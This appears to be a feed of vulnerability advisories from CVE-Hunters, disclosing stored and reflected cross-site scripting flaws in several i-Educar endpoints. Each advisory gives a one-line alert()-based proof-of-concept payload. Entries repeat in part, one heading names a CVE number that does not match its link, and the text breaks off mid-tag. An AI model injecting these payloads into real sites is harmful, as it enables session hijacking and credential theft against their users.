id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-empresas_cadphp">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>empresas_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8542" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8542</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>empresas_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>fantasia</code> and <code>razao_social</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>empresas_cad.php</code></p> <p>Parameters: <code>fantasia</code> and <code>razao_social</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>fantasia</code> and <code>razao_social</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8542/image.png" width="612" height="242" srcset="/p/cve-2025-8542/image_hu_7e7a148fcd72d209.png 480w, /p/cve-2025-8542/image_hu_ebe59eb9954b9d45.png 1024w" loading="lazy" alt="Parameter “fantasia”" class="gallery-image" data-flex-grow="252" data-flex-basis="606px" /></p> <p><img src="/p/cve-2025-8542/image-1.png" width="638" height="246" srcset="/p/cve-2025-8542/image-1_hu_6d47618d6d2bc8d0.png 480w, /p/cve-2025-8542/image-1_hu_e2e58bf53ac570b9.png 1024w" loading="lazy" alt="Parameter “razao_social”" class="gallery-image" data-flex-grow="259" data-flex-basis="622px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8543/ https://www.cvehunters.com/p/cve-2025-8543/ <h2 id="cve-2025-8543-cross-site-scripting-xss-stored-endpoint-educar_raca_cadphp-parameter-nm_raca">CVE-2025-8543: Cross-Site Scripting (XSS) Stored endpoint <code>educar_raca_cad.php</code> parameter <code>nm_raca</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8543" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8543</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_raca_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_raca</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_raca_cad.php</code></p><h2 id="cve-2025-8543-cross-site-scripting-xss-stored-endpoint-educar_raca_cadphp-parameter-nm_raca">CVE-2025-8543: Cross-Site Scripting (XSS) Stored endpoint <code>educar_raca_cad.php</code> parameter <code>nm_raca</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8543" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8543</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_raca_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_raca</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_raca_cad.php</code></p> <p>Parameter: <code>nm_raca</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_raca</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8543/image.png" width="628" height="253" srcset="/p/cve-2025-8543/image_hu_657529f7cbce2b77.png 480w, /p/cve-2025-8543/image_hu_c95c71084112a8f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="595px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8544/ https://www.cvehunters.com/p/cve-2025-8544/ <h2 id="cve-2025-8544-cross-site-scripting-xss-stored-endpoint-regraavaliacaoedit-parameter-nome">CVE-2025-8544: Cross-Site Scripting (XSS) Stored endpoint <code>RegraAvaliacao/edit</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8544" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8544</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>RegraAvaliacao/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>RegraAvaliacao/edit</code></p><h2 id="cve-2025-8544-cross-site-scripting-xss-stored-endpoint-regraavaliacaoedit-parameter-nome">CVE-2025-8544: Cross-Site Scripting (XSS) Stored endpoint <code>RegraAvaliacao/edit</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8544" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8544</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>RegraAvaliacao/edit</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>RegraAvaliacao/edit</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8544/image.png" width="617" height="264" srcset="/p/cve-2025-8544/image_hu_5bcb3566c566cb66.png 480w, /p/cve-2025-8544/image_hu_835b7da877dee7e9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8545/ https://www.cvehunters.com/p/cve-2025-8545/ <h2 id="cve-2025-8545-cross-site-scripting-xss-stored-endpoint-educar_motivo_afastamento_cadphp-parameter-nm_motivo">CVE-2025-8545: Cross-Site Scripting (XSS) Stored endpoint <code>educar_motivo_afastamento_cad.php</code> parameter <code>nm_motivo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8545" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8545</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_motivo_afastamento_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_motivo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_motivo_afastamento_cad.php</code></p><h2 id="cve-2025-8545-cross-site-scripting-xss-stored-endpoint-educar_motivo_afastamento_cadphp-parameter-nm_motivo">CVE-2025-8545: Cross-Site Scripting (XSS) Stored endpoint <code>educar_motivo_afastamento_cad.php</code> parameter <code>nm_motivo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8545" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8545</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_motivo_afastamento_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_motivo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_motivo_afastamento_cad.php</code></p> <p>Parameter: <code>nm_motivo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_motivo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8545/image.png" width="642" height="280" srcset="/p/cve-2025-8545/image_hu_c4c84f0f5992b394.png 480w, /p/cve-2025-8545/image_hu_1f598e1f64a3f4ff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="229" data-flex-basis="550px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8507/ https://www.cvehunters.com/p/cve-2025-8507/ <h2 id="cve-2025-8507-multiples-cross-site-scripting-xss-reflected-in-endpoint-intraneteducar_funcao_lstphp">CVE-2025-8507: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>/intranet/educar_funcao_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8507" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8507</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/intranet/educar_funcao_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_funcao</code> and <code>abreviatura</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_lst.php</code></p> <p>Parameters: <code>nm_funcao</code> and <code>abreviatura</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8507/image.png" width="963" height="838" srcset="/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="275px" ></p> <p style="text-align: justify;">The same issue happens to <code>abreviatura</code> parameter.</p><h2 id="cve-2025-8507-multiples-cross-site-scripting-xss-reflected-in-endpoint-intraneteducar_funcao_lstphp">CVE-2025-8507: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>/intranet/educar_funcao_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8507" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8507</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/intranet/educar_funcao_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_funcao</code> and <code>abreviatura</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_lst.php</code></p> <p>Parameters: <code>nm_funcao</code> and <code>abreviatura</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8507/image.png" width="963" height="838" srcset="/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="275px" /></p> <p style="text-align: justify;">The same issue happens to <code>abreviatura</code> parameter.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8508/ https://www.cvehunters.com/p/cve-2025-8508/ <h2 id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-intraneteducar_avaliacao_desempenho_cadphp">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8508" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8508</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/intranet/educar_avaliacao_desempenho_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>titulo_avaliacao</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_avaliacao_desempenho_cad.php</code></p><h2 id="cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-intraneteducar_avaliacao_desempenho_cadphp">CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8508" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8508</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/intranet/educar_avaliacao_desempenho_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>titulo_avaliacao</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_avaliacao_desempenho_cad.php</code></p> <p>Parameters: <code>titulo_avaliacao</code> and <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>titulo_avaliacao</code> and <code>descricao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8508/image.png" width="737" height="887" srcset="/p/cve-2025-8508/image_hu_2db57f13ab8e6adc.png 480w, /p/cve-2025-8508/image_hu_60c2e044653244a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="83" data-flex-basis="199px" /></p> <p style="text-align: justify;">The payload was submitted via the <code>titulo_avaliacao</code> and <code>descricao</code> fields and stored successfully. When the page displaying these values is accessed, the script is executed in the context of the user's browser session, confirming the presence of a stored XSS vulnerability.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8509/ https://www.cvehunters.com/p/cve-2025-8509/ <h2 id="cve-2025-8509-cross-site-scripting-xss-stored-endpoint-intraneteducar_servidor_cadphp-parameter-matricula">CVE-2025-8509: Cross-Site Scripting (XSS) Stored endpoint <code>/intranet/educar_servidor_cad.php</code> parameter <code>matricula</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8509" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8509</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/intranet/educar_servidor_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>matricula</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_servidor_cad.php</code></p><h2 id="cve-2025-8509-cross-site-scripting-xss-stored-endpoint-intraneteducar_servidor_cadphp-parameter-matricula">CVE-2025-8509: Cross-Site Scripting (XSS) Stored endpoint <code>/intranet/educar_servidor_cad.php</code> parameter <code>matricula</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8509" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8509</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/intranet/educar_servidor_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>matricula</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_servidor_cad.php</code></p> <p>Parameter: <code>matricula</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>matricula</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre 